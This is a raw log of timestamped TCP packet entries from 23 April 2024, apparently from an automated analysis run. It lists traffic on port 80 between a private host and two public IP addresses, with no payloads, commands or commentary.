Apr 23, 2024 09:43:13.177273035 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.364398003 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:13.364501953 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:13.365490913 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:13.409862041 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.409883976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.409900904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.409919024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.409940004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.409972906 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410099983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410119057 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410137892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410146952 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410155058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410171032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410177946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410186052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410202026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410218000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410238981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410254955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410270929 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410290956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410295963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410310030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410320044 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410325050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410340071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.410357952 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.410388947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.570615053 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:13.642633915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642712116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642729044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642745972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642761946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642786026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642787933 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.642802000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642818928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642827988 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.642827988 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.642891884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.642899036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642916918 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642932892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642949104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.642977953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643013954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643101931 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643124104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643141031 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643156052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643170118 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643172026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643199921 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643301010 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643317938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643333912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643353939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643363953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643372059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643388033 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643400908 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643404007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643420935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643430948 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643438101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643445969 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643455029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643470049 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643486023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643496990 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643503904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643520117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643527031 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643543005 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643557072 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643558025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643574953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643587112 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643591881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643606901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643621922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643640041 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643651962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643655062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643671036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.643697977 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.643882990 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.753421068 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:13.753554106 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:13.760483980 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:13.875543118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875567913 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875580072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875592947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875605106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875622988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875639915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875650883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875662088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875673056 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875679016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875684977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875690937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875701904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875700951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875713110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875724077 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875786066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875809908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875825882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875837088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875849009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875870943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875881910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875895977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875906944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875919104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875931025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875946045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875952959 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875974894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875987053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.875997066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875997066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.875998020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876009941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876020908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876030922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876033068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876044989 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876298904 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876445055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876456976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876466036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876472950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876497030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876507998 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876524925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876535892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876547098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876557112 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876568079 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876574993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876583099 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876588106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876596928 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876656055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876668930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876678944 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876679897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876691103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876702070 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876718044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876718998 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876739979 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876740932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876754999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876770020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876771927 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876780987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876792908 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876796007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876808882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876826048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876831055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876837969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876861095 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876863956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876878023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876893044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876900911 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876904964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876913071 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876915932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876926899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876938105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876946926 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876950026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876961946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876972914 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876975060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876986027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.876995087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.876997948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877008915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877011061 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.877019882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877032042 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877041101 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.877043009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877054930 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.877055883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877089024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877099037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877110004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877123117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877134085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.877239943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.964617968 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.069288015 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.069308996 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.069580078 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.083688021 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.108403921 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108498096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108532906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108545065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108563900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108593941 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108647108 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108659029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108671904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108676910 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108685970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108697891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108699083 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108709097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108721018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108726025 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108731985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108743906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108756065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108760118 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108768940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108781099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108783007 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108793020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108804941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108815908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108818054 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108829021 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108839989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108844995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108870983 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108911991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108925104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108936071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108942032 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108947992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108959913 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108973026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108977079 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.108992100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.108994961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109009027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109023094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109023094 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109035015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109046936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109050035 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109059095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109071016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109072924 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109082937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109093904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109106064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109114885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109118938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109131098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109136105 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109143972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109153986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109164953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109164953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109167099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109175920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109190941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109200954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109211922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109222889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109235048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109241962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109246969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109257936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109262943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109270096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109282017 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109282017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109293938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109298944 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109298944 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109304905 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109317064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109328032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109340906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109344006 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109353065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109365940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109366894 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109378099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109379053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109395981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109410048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109422922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109424114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109450102 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109452009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109463930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109477043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109483957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109493017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109504938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109505892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109517097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109528065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109541893 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109555006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109555960 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109568119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109572887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109580994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109591961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109596968 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109603882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109616995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109618902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109632969 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109637022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109651089 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109663963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109678984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109690905 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109703064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109714985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109726906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109741926 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109754086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109754086 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109765053 CEST	80	49702	176.97.76.106	192.168.2.7
